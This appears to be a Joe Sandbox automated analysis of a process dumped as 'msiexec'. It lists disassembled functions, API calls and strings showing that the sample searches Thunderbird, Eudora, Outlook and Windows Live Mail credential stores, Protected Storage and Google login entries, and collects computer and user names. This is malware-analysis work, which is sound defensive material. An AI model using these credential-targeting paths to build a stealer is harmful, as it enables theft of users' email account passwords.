405f04 SetDlgItemTextA GetDlgItemTextA 33982 44b301 ??3@YAXPAX 33985 4120ea 14 API calls 3 library calls 33986 40bb0a 8 API calls 33988 413f11 strcmp 33792 434110 17 API calls __fprintf_l 33794 425115 108 API calls __fprintf_l 33989 444b11 _onexit 33796 425115 76 API calls __fprintf_l 33799 429d19 10 API calls 33992 444b1f __dllonexit 33993 409f20 _strcmpi 33801 42b927 31 API calls 33996 433f26 19 API calls __fprintf_l 33997 44b323 FreeLibrary 33998 427f25 46 API calls 33999 43ff2b 17 API calls 34000 43fb30 19 API calls 33808 414d36 16 API calls 33810 40ad38 7 API calls 34002 433b38 16 API calls __fprintf_l 33680 44b33b 33681 44b344 ??3@YAXPAX 33680->33681 33682 44b34b 33680->33682 33681->33682 33683 44b354 ??3@YAXPAX 33682->33683 33684 44b35b 33682->33684 33683->33684 33685 44b364 ??3@YAXPAX 33684->33685 33686 44b36b 33684->33686 33685->33686 33687 44b374 ??3@YAXPAX 33686->33687 33688 44b37b 33686->33688 33687->33688 33814 426741 21 API calls 33815 40c5c3 123 API calls 33817 43fdc5 17 API calls 34003 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 33820 4161cb memcpy memcpy memcpy memcpy 34008 43ffc8 18 API calls 34010 4383cc 110 API calls __fprintf_l 33822 4275d3 41 API calls 34011 4153d3 22 API calls __fprintf_l 33823 444dd7 _XcptFilter 34016 4013de 15 API calls 34018 425115 111 API calls __fprintf_l 34019 43f7db 18 API calls 34022 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 33826 4335ee 16 API calls __fprintf_l 34024 429fef 11 API calls 33827 444deb _exit _c_exit 34025 40bbf0 133 API calls 33830 425115 79 API calls __fprintf_l 34029 437ffa 22 API calls 33834 4021ff 14 API calls 33835 43f5fc 149 API calls 34030 40e381 9 API calls 33837 405983 40 API calls 33838 42b186 27 API calls __fprintf_l 33839 427d86 76 API calls 33840 403585 20 API calls 33842 42e58e 18 API calls __fprintf_l 33845 425115 75 API calls __fprintf_l 33847 401592 8 API calls 32883 410b92 32886 410a6b 32883->32886 32885 410bb2 32887 410a77 32886->32887 32888 410a89 GetPrivateProfileIntA 32886->32888 32891 410983 memset _itoa WritePrivateProfileStringA 32887->32891 32888->32885 32890 410a84 32890->32885 32891->32890 34034 434395 16 API calls 33849 441d9c memcmp 34036 43f79b 119 API calls 33850 40c599 42 API calls 34037 426741 87 API calls 33854 4401a6 21 API calls 33856 426da6 memcpy memset memset memcpy 33857 4335a5 15 API calls 33859 4299ab memset memset memcpy memset memset 33860 40b1ab 8 API calls 34042 425115 76 API calls __fprintf_l 34046 4113b2 18 API calls 2 library calls 34050 40a3b8 memset sprintf SendMessageA 32892 410bbc 32895 4109cf 32892->32895 32896 4109dc 32895->32896 32897 410a23 memset GetPrivateProfileStringA 32896->32897 32898 4109ea memset 32896->32898 32903 407646 strlen 32897->32903 32908 4075cd sprintf memcpy 32898->32908 32901 410a0c WritePrivateProfileStringA 32902 410a65 32901->32902 32904 40765a 32903->32904 32906 40765c 32903->32906 32904->32902 32905 4076a3 32905->32902 32906->32905 32909 40737c strtoul 32906->32909 32908->32901 32909->32906 33862 40b5bf memset memset _mbsicmp

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040832F
                                                                                                          • memset.MSVCRT ref: 00408343
                                                                                                          • memset.MSVCRT ref: 0040835F
                                                                                                          • memset.MSVCRT ref: 00408376
                                                                                                          • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                          • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                          • strlen.MSVCRT ref: 004083E9
                                                                                                          • strlen.MSVCRT ref: 004083F8
                                                                                                          • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                          • String ID: 5$H$O$b$i$}$}
                                                                                                          • API String ID: 1832431107-3760989150
                                                                                                          • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                          • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                          • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                          • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 342 407f89-407f8f 338->342 343 407f83 339->343 344 407f76-407f81 call 4070e3 339->344 340->338 345 407f86-407f88 343->345 344->345 345->342
                                                                                                          APIs
                                                                                                          • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                          • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                          • strlen.MSVCRT ref: 00407F5C
                                                                                                          • strlen.MSVCRT ref: 00407F64
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileFindstrlen$FirstNext
                                                                                                          • String ID: ACD
                                                                                                          • API String ID: 379999529-620537770
                                                                                                          • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                          • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                          • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                          • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00401E8B
                                                                                                          • strlen.MSVCRT ref: 00401EA4
                                                                                                          • strlen.MSVCRT ref: 00401EB2
                                                                                                          • strlen.MSVCRT ref: 00401EF8
                                                                                                          • strlen.MSVCRT ref: 00401F06
                                                                                                          • memset.MSVCRT ref: 00401FB1
                                                                                                          • atoi.MSVCRT(?), ref: 00401FE0
                                                                                                          • memset.MSVCRT ref: 00402003
                                                                                                          • sprintf.MSVCRT ref: 00402030
                                                                                                          • memset.MSVCRT ref: 00402086
                                                                                                          • memset.MSVCRT ref: 0040209B
                                                                                                          • strlen.MSVCRT ref: 004020A1
                                                                                                          • strlen.MSVCRT ref: 004020AF
                                                                                                          • strlen.MSVCRT ref: 004020E2
                                                                                                          • strlen.MSVCRT ref: 004020F0
                                                                                                          • memset.MSVCRT ref: 00402018
                                                                                                            • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                            • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                          • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                          • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                          • API String ID: 3833278029-4223776976
                                                                                                          • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                                          • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                          • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                                                                          • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                            • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                            • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                            • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                          • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                          • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                          • API String ID: 745651260-375988210
                                                                                                          • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                                          • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                          • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                                          • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                          • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                          • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                          Strings
                                                                                                          • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                          • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                          • pstorec.dll, xrefs: 00403C30
                                                                                                          • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                          • PStoreCreateInstance, xrefs: 00403C44
                                                                                                          • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                          • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                          • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                          • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                          • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                          • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                          • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                          • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                          • API String ID: 1197458902-317895162
                                                                                                          • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                                          • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                          • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                                          • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 238 444c80-444c85 236->238 239 444c9f-444ca3 236->239 246 444d02-444d0d __setusermatherr 237->246 247 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->247 238->234 241 444c8c-444c93 238->241 239->234 242 444ca5-444ca7 239->242 241->234 244 444c95-444c9d 241->244 245 444cad-444cb0 242->245 244->245 245->237 246->247 250 444da4-444da7 247->250 251 444d6a-444d72 247->251 254 444d81-444d85 250->254 255 444da9-444dad 250->255 252 444d74-444d76 251->252 253 444d78-444d7b 251->253 252->251 252->253 253->254 256 444d7d-444d7e 253->256 257 444d87-444d89 254->257 258 444d8b-444d9c GetStartupInfoA 254->258 255->250 256->254 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 3662548030-0
                                                                                                          • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                                          • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                                          • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                                          • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0044430B
                                                                                                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                            • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                            • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                            • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                            • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                          • memset.MSVCRT ref: 00444379
                                                                                                          • memset.MSVCRT ref: 00444394
                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                          • strlen.MSVCRT ref: 004443DB
                                                                                                          • _strcmpi.MSVCRT ref: 00444401
                                                                                                          Strings
                                                                                                          • Store Root, xrefs: 004443A5
                                                                                                          • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                          • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                          • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                          • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                          • API String ID: 3203569119-2578778931
                                                                                                          • Opcode ID: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                                          • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                          • Opcode Fuzzy Hash: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                                          • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2054149589-0
                                                                                                          • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                                          • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                          • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                                          • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 321 40ba74 314->321 322 40ba6f-40ba72 314->322 315->308 315->309 316 40baa0-40bab3 call 407e30 324 40bab5-40bac1 316->324 325 40bafa-40bb09 SetCursor 316->325 323 40ba75-40ba76 call 40b5e5 321->323 322->323 323->315 327 40bac3-40bace 324->327 328 40bad8-40baf7 qsort 324->328 327->328 328->325 331->316 332->316 333->316 334->316
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Cursor_mbsicmpqsort
                                                                                                          • String ID: /nosort$/sort
                                                                                                          • API String ID: 882979914-1578091866
                                                                                                          • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                          • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                          • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                          • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 004109F7
                                                                                                            • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                            • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                          • memset.MSVCRT ref: 00410A32
                                                                                                          • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 3143880245-0
                                                                                                          • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                          • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                          • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                          • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 358 44b33b-44b342 359 44b344-44b34a ??3@YAXPAX@Z 358->359 360 44b34b-44b352 358->360 359->360 361 44b354-44b35a ??3@YAXPAX@Z 360->361 362 44b35b-44b362 360->362 361->362 363 44b364-44b36a ??3@YAXPAX@Z 362->363 364 44b36b-44b372 362->364 363->364 365 44b374-44b37a ??3@YAXPAX@Z 364->365 366 44b37b 364->366 365->366
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??3@
                                                                                                          • String ID:
                                                                                                          • API String ID: 613200358-0
                                                                                                          • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                          • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                          • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                          • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 367 410dbb-410dd2 call 410d0e 370 410dd4-410ddd call 4070ae 367->370 371 410dfd-410e1b memset 367->371 379 410ddf-410de2 370->379 380 410dee-410df1 370->380 373 410e27-410e35 371->373 374 410e1d-410e20 371->374 375 410e45-410e4f call 410a9c 373->375 374->373 377 410e22-410e25 374->377 384 410e51-410e76 call 410d3d call 410add 375->384 385 410e7f-410e92 _mbscpy 375->385 377->373 381 410e37-410e40 377->381 379->371 383 410de4-410de7 379->383 387 410df8 380->387 381->375 383->371 386 410de9-410dec 383->386 384->385 389 410e95-410e97 385->389 386->371 386->380 387->389
                                                                                                          APIs
                                                                                                            • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                                            • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                          • memset.MSVCRT ref: 00410E10
                                                                                                          • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                            • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                          Strings
                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000C.00000002.2180476555.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                          • API String ID: 119022999-2036018995
                                                                                                          • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                          • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                          • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                          • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 393 4085d2-408605 call 44b090 call 4082cd call 410a9c 400 4086d8-4086dd 393->400 401 40860b-40863d memset call 410b62 393->401 404 4086c7-4086cc 401->404 405 408642-40865a call 410a9c 404->405 406 4086d2 404->406 409 4086b1-4086c2 call 410b62 405->409 410 40865c-4086ab memset call 410add call 40848b 405->410 406->400 409->404 410->409
                                                                                                          APIs
                                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                            • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                            • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                            • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                            • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                            • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                          • memset.MSVCRT ref: 00408620
                                                                                                            • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                          • memset.MSVCRT ref: 00408671
                                                                                                          Strings
